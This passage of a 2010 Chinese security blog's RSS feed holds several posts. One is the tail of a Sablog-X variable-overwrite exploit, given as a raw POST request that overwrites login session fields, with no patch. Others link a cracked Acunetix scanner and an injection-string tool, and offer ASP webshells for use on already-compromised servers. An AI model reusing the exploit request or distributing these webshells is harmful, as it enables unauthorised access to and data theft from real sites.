HTTP/1.1&lt;br /&gt;Accept: */*&lt;br /&gt;Accept-Language: zh-cn&lt;br /&gt;Referer: http://127.0.0.1/sax/cp.php&lt;br /&gt;Content-Type: application/x-www-form-urlencoded&lt;br /&gt;User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)&lt;br /&gt;Host: 127.0.0.1&lt;br /&gt;Content-Length: 138&lt;br /&gt;Connection: Close&lt;/p&gt;&lt;p&gt;_EVO[sax_uid]=1&amp;amp;_EVO[sax_pw]=1&amp;amp;_EVO[sax_logincount]=1&amp;amp;_EVO[sax_hash]=1&amp;amp;_EVO[sax_group]=1&amp;amp;_EVO[sax_auth_key]=1&amp;amp;_EVO[timestamp]=111111111111&lt;/p&gt;&lt;p&gt;&lt;br /&gt;四 补丁[fix]&lt;/p&gt;&lt;p&gt;缺&lt;br /&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Webapps.html&quot;&gt;Web apps&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Sablog%2DX&quot;&gt;Sablog-X&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96&quot;&gt;变量覆盖&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/Sablog-X.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(0)&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Sablog-X.html#comment&quot; target=&quot;_blank&quot;&gt;还没有相关文章，您来说两句？&lt;/a&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/338986696/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~7171797/338986696/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/338986696/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/338986696/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Web apps</category><pubDate>Thu, 18 Feb 2010 23:28:09 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/Sablog-X.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/Sablog-X.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/Sablog-X.html</fs:srclink><fs:srcfeed>http://www.pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~7171797/338986696/5281982</fs:itemid></item><item><title>Portable Acunetix Web Vulnerability Scanner Enterprise Edition v6.5 build 20100210</title><link>http://item.feedsky.com/~feedsky/pcsec/~7171797/338986697/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=488</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=488&amp;key=e838c366</trackback:ping><description>&lt;p&gt;&lt;strong&gt;#Trace: 今天在Pst聚合上看到一个Acunetix Web Vulnerability Scanner v6.5 build 20100210的补丁，在网上没找到安装包，问了几个人也没问到，找到一个便携版的，在vmware里试了下，可以升级。源地址被墙，已经上传到Rapidshare上。&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;em&gt;&lt;strong&gt;Download Portable Acunetix Web Vulnerability Scanner Enterprise Edition v65 build 20100210：&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://rapidshare.com/files/352198683/pawvs.7z&quot;&gt;http://rapidshare.com/files/352198683/pawvs.7z&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;img title=&quot;&quot; alt=&quot;&quot; onload=&quot;ResizeImage(this,520)&quot; src=&quot;http://www.pcsec.org/upload/2010/2/awvs1.png&quot; /&gt;&lt;img title=&quot;&quot; alt=&quot;&quot; onload=&quot;ResizeImage(this,520)&quot; src=&quot;http://www.pcsec.org/upload/2010/2/awvs2.png&quot; /&gt;&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Download.html&quot;&gt;Download&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Acunetix+Web+Vulnerability+Scanner&quot;&gt;Acunetix Web Vulnerability Scanner&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=20100210&quot;&gt;20100210&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=AWVS&quot;&gt;AWVS&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=WVS&quot;&gt;WVS&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/Portable-Acunetix-Web-Vulnerability-Scanner-Enterprise-Edition-v65-build-20100210.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(3)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-6.5-Build-2010-02-10-Enterprise-Version.html&quot;&gt;Acunetix Web Vulnerability Scanner 6.5 Build 2010_02_10 Enterprise Version&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2010-2-27 10:9:28)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-6.5-Crack-Build-20090917.html&quot;&gt;Acunetix Web Vulnerability Scanner 6.5 Crack Build 20090917&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2009-11-23 20:38:46)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-v6120090504-CrackedAcunetix-Web-Vulnerability-Scanner-v6120090504-patch.html&quot;&gt;Acunetix Web Vulnerability Scanner v6.1.20090504 最新破解版&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2009-5-12 13:9:3)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/web-vulnerability-scanner-20090317-Crack.html&quot;&gt;web vulnerability scanner 20090317 Crack&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2009-3-18 18:42:1)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-6.html&quot;&gt;Acunetix Web Vulnerability Scanner 6.0&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2008-11-28 20:47:24)&lt;/p&gt;&lt;/ul&gt;&lt;hr /&gt; &lt;h3&gt;最新评论:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Portable-Acunetix-Web-Vulnerability-Scanner-Enterprise-Edition-v65-build-20100210.html#cmt255&quot;&gt;2010-2-22 21:51:35&lt;/a&gt;，&lt;a href=&quot;http://www.st0p.org&quot;&gt;st0p&lt;/a&gt; ： 偶去试试，谢谢TR&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Portable-Acunetix-Web-Vulnerability-Scanner-Enterprise-Edition-v65-build-20100210.html#cmt253&quot;&gt;2010-2-18 13:43:5&lt;/a&gt;，&lt;a href=&quot;http://www.unhex.net&quot;&gt;無材&lt;/a&gt; ： 谢谢tr分享&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Portable-Acunetix-Web-Vulnerability-Scanner-Enterprise-Edition-v65-build-20100210.html#cmt252&quot;&gt;2010-2-18 13:7:17&lt;/a&gt;，&lt;a href=&quot;http://www.03389.com&quot;&gt;樱木花盗&lt;/a&gt; ： 下回来看看，感谢Trace分享.&lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/338986697/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~7171797/338986697/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/338986697/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/338986697/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Download</category><pubDate>Thu, 18 Feb 2010 12:56:15 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/Portable-Acunetix-Web-Vulnerability-Scanner-Enterprise-Edition-v65-build-20100210.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/Portable-Acunetix-Web-Vulnerability-Scanner-Enterprise-Edition-v65-build-20100210.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/Portable-Acunetix-Web-Vulnerability-Scanner-Enterprise-Edition-v65-build-20100210.html</fs:srclink><fs:srcfeed>http://www.pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~7171797/338986697/5281982</fs:itemid></item><item><title>NoMore AND 1=1 - Web Application Testing Tool released</title><link>http://item.feedsky.com/~feedsky/pcsec/~7171797/338986698/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=487</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=487&amp;key=2938412d</trackback:ping><description>&lt;p&gt;&lt;strong&gt;#Trace: 等待完善&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;NoMore AND 1=1 is a tool that helps the Web Application Tester by &lt;br /&gt;containing a large categorized list of useful expressions to inject in &lt;br /&gt;his day to day duties . Those expressions come from guys like Ferruh &lt;br /&gt;Mavituna, Hack.ers, etc (all credited in the sources) and personal &lt;br /&gt;experience.&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;img title=&quot;&quot; alt=&quot;&quot; onload=&quot;ResizeImage(this,520)&quot; src=&quot;http://www.pcsec.org/upload/2010/2/201002141613467304.jpg&quot; /&gt;&lt;/p&gt;&lt;p&gt;A standalone and a Webscarab attached version exist and can be found here: &lt;br /&gt;&lt;span style=&quot;font-weight: bold&quot;&gt;- standalone&lt;/span&gt; &lt;a target=&quot;_blank&quot; href=&quot;http://wiki.eslimasec.com/esliwiki/ProjectsPost?action=AttachFile&amp;amp;do=get&amp;amp;target=Standalone_NoMore_AND_1%3D1_v04.zip&quot;&gt;http://wiki.eslimasec.com/esliwiki/ProjectsPost?action=AttachFile&amp;amp;do=get&amp;amp;target=Standalone_NoMore_AND_1%3D1_v04.zip&lt;/a&gt; &lt;br /&gt;&lt;span style=&quot;font-weight: bold&quot;&gt;- webscarab attached:&lt;/span&gt; &lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://wiki.eslimasec.com/esliwiki/ProjectsPost?action=AttachFile&amp;amp;do=get&amp;amp;target=Webscarab_NoMore_v0.3.zip&quot;&gt;http://wiki.eslimasec.com/esliwiki/ProjectsPost?action=AttachFile&amp;amp;do=get&amp;amp;target=Webscarab_NoMore_v0.3.zip&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold&quot;&gt;Screenshots, usage and more info here: &lt;/span&gt;&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://wiki.eslimasec.com/esliwiki/ProjectsPost&quot;&gt;http://wiki.eslimasec.com/esliwiki/ProjectsPost&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Download.html&quot;&gt;Download&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Web+Application+Testing&quot;&gt;Web Application Testing&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=tool&quot;&gt;tool&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/nomore-and-11-web-application-testing.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(0)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/new-tool-and-paper-for-oracle-forensics.html&quot;&gt;New tool and paper for Oracle forensics&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2008-11-26 16:30:16)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/microsoft-security-assessment-tool-free-for-windows.html&quot;&gt;Microsoft Security Assessment Tool - Free for Windows&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2008-11-18 22:52:50)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/38.html&quot;&gt;新型 .net 一句话及客户端&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2008-10-13 17:7:18)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/33.html&quot;&gt;Dbshell&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2008-10-12 12:23:38)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Top-15-free-SQL-Injection-Scanners.html&quot;&gt;Top 15 free SQL Injection Scanners&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2008-7-4 1:9:19)&lt;/p&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/338986698/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~7171797/338986698/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/338986698/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/338986698/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Download</category><pubDate>Sun, 14 Feb 2010 16:12:29 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/nomore-and-11-web-application-testing.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/nomore-and-11-web-application-testing.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/nomore-and-11-web-application-testing.html</fs:srclink><fs:srcfeed>http://www.pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~7171797/338986698/5281982</fs:itemid></item><item><title>asprootkit</title><link>http://item.feedsky.com/~feedsky/pcsec/~7171797/338986699/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=485</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=485&amp;key=32ae3b3e</trackback:ping><description>&lt;p&gt;&lt;strong&gt;Author: bloodsword&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;是学习wmi的练手作品，专门为管理员身份下运行设计的，普通的IISUSER身份下无法正常运行。如果你提权加上了用户，却因为种种原因，暂时进不了终 端什么的，可以传这个shell到服务器上，做一些猥琐的事。有的时候在shell下操作也是很方便的哦&lt;br /&gt;你可能会问了，这个跟海洋的以管理员身份登陆有什么区别？海洋毕竟不是专门为这种环境设计的。而且熟悉IIS权限机制的同学都应该知道，普通的 webshell，就算用管理员身份登陆了，执行命令还是应用程序池的身份。而这个shell，无论任何操作，包括运行程序，都是以你登陆用户的身份&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.pcsec.org/upload/2010/2/asprootkit.rar&quot;&gt;asprootkit.rar&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Download.html&quot;&gt;Download&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=asp&quot;&gt;asp&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=asprootkit&quot;&gt;asprootkit&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=WMI&quot;&gt;WMI&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=bloodsword&quot;&gt;bloodsword&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/asprootkit.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(1)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Asp-Script-for-DBSM-managing.html&quot;&gt;ASP连接任何数据库的脚本&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2010-2-2 23:43:13)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/make-asp-webshell-with-wsc.html&quot;&gt;利用wsc 来做一个asp后门&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2008-12-5 16:10:38)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/wmi-manual-pdf.html&quot;&gt;《WMI技术指南》中文版 PDF格式&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2008-11-19 17:52:27)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/penetrate-with-isnumeric.html&quot;&gt;渗透中巧用IsNumeric函数&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2008-9-27 0:36:34)&lt;/p&gt;&lt;/ul&gt;&lt;hr /&gt; &lt;h3&gt;最新评论:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/asprootkit.html#cmt251&quot;&gt;2010-2-17 15:18:30&lt;/a&gt;，bloodsword ： 死黑客啊，这么快发出来，那边都没人买我的了，全跑到外面来下免费的-_-&lt;blockquote&gt;&lt;div class=&quot;quote quote3&quot;&gt;&lt;div class=&quot;quote-title&quot;&gt;Trace 于 2010-2-17 16:16:21 回复&lt;/div&gt;&lt;img src=&quot;http://www.pcsec.org/image/face/Hehe.gif&quot; style=&quot;padding:2px;border:0;&quot; width=&quot;48&quot; title=&quot;Hehe&quot; alt=&quot;Hehe&quot; /&gt;黑客，你都赚够了。&lt;/div&gt;&lt;/blockquote&gt;&lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/338986699/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~7171797/338986699/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/338986699/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/338986699/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Download</category><pubDate>Sat, 13 Feb 2010 12:50:02 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/asprootkit.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/asprootkit.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/asprootkit.html</fs:srclink><fs:srcfeed>http://www.pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~7171797/338986699/5281982</fs:itemid></item><item><title>ASP连接任何数据库的脚本</title><link>http://item.feedsky.com/~feedsky/pcsec/~7171797/338986700/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=484</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=484&amp;key=54c2f4f2</trackback:ping><description>&lt;p&gt;Author: &lt;strong&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.sablog.net/blog/archives/467/&quot;&gt;4ngel&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;前段时间研究DB2、SYBASE、ORACLE，某些特定情况需要ASP来连接。写了一个ASP。来连接数据库。而且还可以根据查询语句做相应输出。对于某些&amp;ldquo;商业间谍&amp;rdquo;来说。简直就是居家旅行必备。只不过效率太低了。查询几百万条的数据。那个慢啊。要是碰到多表关联的。很容易超时。所以查询之前根据语句先建立个索引。可以极大提高效率。然后再分页输出。然后再XXXXX。&lt;br /&gt;&lt;br /&gt;本来这种小脚本是不用的。一般去服务器上就可以操作数据库了。但是还真的有一些特定情况。上不了服务器的。只能从WEB操作。没办法。在那种极端的情况下。这种小东西就诞生了。截图留点纪念。。。不过由于以前进去的服务器哪个是DB2的不记得了。所以没有截图留念。可惜了。。&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;/upload/2010/2/getdata.rar&quot;&gt;Attachment&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Download.html&quot;&gt;Download&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=asp&quot;&gt;asp&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Database&quot;&gt;Database&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=webshell&quot;&gt;webshell&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=%E6%95%B0%E6%8D%AE%E5%BA%93&quot;&gt;数据库&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Oracle&quot;&gt;Oracle&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/Asp-Script-for-DBSM-managing.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(0)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/asprootkit.html&quot;&gt;asprootkit&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2010-2-13 12:50:2)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/use-metasploit-to-crack-oracle-password-with-linux.html&quot;&gt;Linux下安装Metasploit破解Oracle登录用户名密码&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2009-10-20 14:12:46)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Oracle-Hacking-with-Metasploit-Videos.html&quot;&gt;Oracle Hacking with Metasploit Videos&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2009-8-3 3:39:10)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/ASPXspy-2.html&quot;&gt;ASPXspy 2.0 &lt;/a&gt;&amp;nbsp;&amp;nbsp;(2009-7-15 10:24:26)&lt;/p&gt;&lt;p&gt;&lt;a  href=&quot;http://www.pcsec.org/archives/Orcale-TNS-listener-support-for-nmap.html&quot;&gt;Orcale TNS listener support for nmap&lt;/a&gt;&amp;nbsp;&amp;nbsp;(2009-6-28 0:39:51)&lt;/p&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/338986700/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~7171797/338986700/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/338986700/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/338986700/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Download</category><pubDate>Tue, 02 Feb 2010 23:43:13 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/Asp-Script-for-DBSM-managing.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/Asp-Script-for-DBSM-managing.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/Asp-Script-for-DBSM-managing.html</fs:srclink><fs:srcfeed>http://www.pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~7171797/338986700/5281982</fs:itemid></item></channel></rss>